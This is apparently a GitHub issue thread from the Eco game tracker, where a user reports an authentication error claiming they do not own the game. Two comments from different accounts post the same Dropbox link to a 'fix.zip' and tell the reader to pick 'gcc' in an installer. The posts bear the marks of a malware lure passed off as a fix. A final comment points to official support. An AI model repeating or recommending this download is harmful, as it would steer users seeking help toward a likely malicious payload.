### ISSUE TITLE
USER ISSUE: just trying to log in. I do own the game

### ISSUE THREAD

**Issue by Huntermills40** [StrangeLoopGames/EcoIssues#25102]
\
**User Id: (180ce157-7c95-4f83-747f-08dcc2f971c4)**
**Version:** 0.11.0.2 beta release-707

**Steps to Reproduce:**

**Expected behavior:**

**Actual behavior:**
The following error message popped up:
```
Authentication handshake failed with exception:
Internal Server Error

Status: 500
Response: 

User does not own Eco.

```

**Do you have mods installed? Does the issue happen when no mods are installed?:**
No mods installed

**Please provide log files. Instruction is here https://github.com/StrangeLoopGames/EcoIssues/wiki/Getting-the-Eco-game-log-file

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by D3nnis3n** [comment]
For account issues, please reach out to support@strangeloopgames.com, they cannot be handled here.
